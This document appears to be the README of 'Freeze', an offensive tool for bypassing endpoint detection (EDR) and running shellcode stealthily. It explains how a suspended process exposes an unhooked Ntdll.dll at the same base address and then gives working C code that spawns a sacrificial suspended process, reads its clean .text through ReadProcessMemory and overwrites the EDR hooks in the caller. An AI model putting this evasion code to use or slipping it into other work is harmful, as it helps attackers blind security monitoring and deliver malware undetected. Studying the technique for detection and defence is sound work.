Description

Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. Freeze utilizes multiple techniques to not only remove userland EDR hooks, but also to execute shellcode in such a way that it circumvents other endpoint monitoring controls.

When a process is created, Ntdll.dll is the first DLL that is loaded, and this happens before any EDR DLLs are loaded. This means that there is a bit of a delay before an EDR can get its own DLL loaded and start hooking and modifying the assembly of system DLLs. If we create a process in a suspended state (CREATE_SUSPENDED, so its initial thread is frozen in time before the loader runs), we can see that no other DLLs are loaded except for Ntdll.dll. No EDR DLLs are loaded either, meaning that the syscall stubs located in Ntdll.dll are still unmodified.

In order to use this clean suspended process to remove the hooks from the Freeze loader's own copy of Ntdll.dll, we need a way to programmatically find and read the clean suspended process' memory. This is where address space layout randomization (ASLR) comes into play. ASLR is a mitigation that makes memory-corruption vulnerabilities harder to exploit reliably: it randomizes the address space inside a process so that the base addresses of the executable, the stack, the heap and memory-mapped objects differ from run to run. Now, this is where it gets interesting, because while ASLR does work, shared system DLLs such as Ntdll.dll are handled differently. Their load address is randomized once, at boot time, and that same base address is then used in every process so the image pages can be shared. This means that we don't need to enumerate the remote process to find the base address of its Ntdll.dll, because it is the same in all processes, including the one that we control. We can take the Ntdll.dll base from our own process (for example via GetModuleHandle) and, with this information, use the ReadProcessMemory API to read the clean copy out of the suspended process and write it over the hooked bytes in our own process. One caveat: creating the sacrificial process is itself visible to kernel-side process-creation callbacks, so this removes userland hooks only and does nothing about kernel or ETW telemetry.

If you want to learn more about the techniques utilized in this framework, please take a look at the SourceZero Blog.
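The procedure above (suspended process, same Ntdll.dll base in both processes, ReadProcessMemory, overwrite the hooked .text) as an added example in C. This is not Freeze's own code. The PE-header walk and the byte-for-byte restore are portable and are exercised here against a constructed minimal PE image (not a real Ntdll.dll); the Windows driver that spawns the suspended process is compiled only under _WIN32, and its choice of notepad.exe as the sacrificial binary is an assumption, as are the function names unhook_ntdll, find_text_section and restore_text.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Find the ".text" section of a PE image from its headers (mapped read-only at
   the module base). Returns 0 and fills rva/vsize, or -1 on malformed input. */
int find_text_section(const uint8_t *image, size_t size, uint32_t *rva, uint32_t *vsize)
{
    uint32_t e_lfanew; uint16_t nsec, optsz;
    if (size < 0x40 || image[0] != 'M' || image[1] != 'Z') return -1;
    memcpy(&e_lfanew, image + 0x3C, 4);                       /* IMAGE_DOS_HEADER.e_lfanew */
    if ((size_t)e_lfanew + 24 > size || memcmp(image + e_lfanew, "PE\0\0", 4)) return -1;
    const uint8_t *coff = image + e_lfanew + 4;               /* IMAGE_FILE_HEADER */
    memcpy(&nsec, coff + 2, 2);                               /* NumberOfSections */
    memcpy(&optsz, coff + 16, 2);                             /* SizeOfOptionalHeader */
    const uint8_t *sec = coff + 20 + optsz;                   /* IMAGE_SECTION_HEADER[0] */
    for (uint16_t i = 0; i < nsec; i++, sec += 40) {
        if ((size_t)(sec - image) + 40 > size) return -1;
        if (memcmp(sec, ".text\0\0\0", 8) == 0) {
            memcpy(vsize, sec + 8, 4);                        /* Misc.VirtualSize */
            memcpy(rva, sec + 12, 4);                         /* VirtualAddress */
            return 0;
        }
    }
    return -1;
}

/* Overwrite every byte of the hooked .text that differs from the clean copy.
   Returns how many bytes were patched (0 means nothing was hooked). */
size_t restore_text(uint8_t *hooked, const uint8_t *clean, size_t len)
{
    size_t patched = 0;
    for (size_t i = 0; i < len; i++)
        if (hooked[i] != clean[i]) { hooked[i] = clean[i]; patched++; }
    return patched;
}

/* Constructed sample, not a real ntdll: minimal PE32+ headers with a single
   ".text" section at RVA 0x1000 holding 0x20 bytes of NOPs as "clean code". */
enum { FAKE_RVA = 0x1000, FAKE_VSIZE = 0x20, FAKE_SIZE = FAKE_RVA + FAKE_VSIZE };
static void build_fake_image(uint8_t *img)
{
    uint32_t e_lfanew = 0x80, vsize = FAKE_VSIZE, rva = FAKE_RVA;
    uint16_t nsec = 1, optsz = 240;                           /* sizeof IMAGE_OPTIONAL_HEADER64 */
    memset(img, 0, FAKE_SIZE);
    memcpy(img, "MZ", 2);
    memcpy(img + 0x3C, &e_lfanew, 4);
    memcpy(img + e_lfanew, "PE\0\0", 4);
    memcpy(img + e_lfanew + 4 + 2, &nsec, 2);
    memcpy(img + e_lfanew + 4 + 16, &optsz, 2);
    uint8_t *sec = img + e_lfanew + 4 + 20 + optsz;
    memcpy(sec, ".text\0\0\0", 8);
    memcpy(sec + 8, &vsize, 4);
    memcpy(sec + 12, &rva, 4);
    memset(img + FAKE_RVA, 0x90, FAKE_VSIZE);
}

/* Plant a 5-byte inline jmp (E9 rel32), the usual userland hook shape, in a copy
   of the constructed image and restore it. Returns bytes patched (5) on success. */
int demo_restore_constructed(void)
{
    static uint8_t clean[FAKE_SIZE], hooked[FAKE_SIZE];
    uint32_t rva, vsize;
    build_fake_image(clean);
    memcpy(hooked, clean, FAKE_SIZE);
    if (find_text_section(hooked, FAKE_SIZE, &rva, &vsize) != 0) return -1;
    memcpy(hooked + rva + 8, "\xE9\x11\x22\x33\x44", 5);
    size_t n = restore_text(hooked + rva, clean + rva, vsize);
    return memcmp(hooked, clean, FAKE_SIZE) == 0 ? (int)n : -1;
}

#ifdef _WIN32
/* Spawn a sacrificial process suspended (only ntdll.dll mapped, no EDR DLL yet),
   read its ntdll .text at OUR ntdll base (identical in every process this boot)
   and copy it over our own. Returns bytes patched, or -1 on API failure. */
long unhook_ntdll(void)
{
    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    uint32_t rva, vsize; SIZE_T got = 0; DWORD old; long result = -1;
    /* notepad.exe is an arbitrary choice of sacrificial binary (assumption). */
    if (!CreateProcessA("C:\\Windows\\System32\\notepad.exe", NULL, NULL, NULL, FALSE,
                        CREATE_SUSPENDED, NULL, NULL, &si, &pi))
        return -1;
    uint8_t *base = (uint8_t *)GetModuleHandleA("ntdll.dll");
    uint8_t *clean = base && find_text_section(base, 0x1000, &rva, &vsize) == 0
                     ? (uint8_t *)malloc(vsize) : NULL;
    if (clean && ReadProcessMemory(pi.hProcess, base + rva, clean, vsize, &got) && got == vsize
        && VirtualProtect(base + rva, vsize, PAGE_EXECUTE_READWRITE, &old)) {
        result = (long)restore_text(base + rva, clean, vsize);
        VirtualProtect(base + rva, vsize, old, &old);
    }
    free(clean);
    TerminateProcess(pi.hProcess, 0);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return result;
}
#endif
```

On Windows, call unhook_ntdll() and check that the return value is non-negative; a result of 0 means no byte of .text differed, i.e. nothing was hooked. No relocation fix-up is needed on the copied bytes precisely because both processes map Ntdll.dll at the same base. Note that VirtualProtect, used here to make .text writable, is itself commonly hooked, so a real loader has to be careful about which APIs it calls before the restore is done; on a non-Windows host only the constructed-image demo is available.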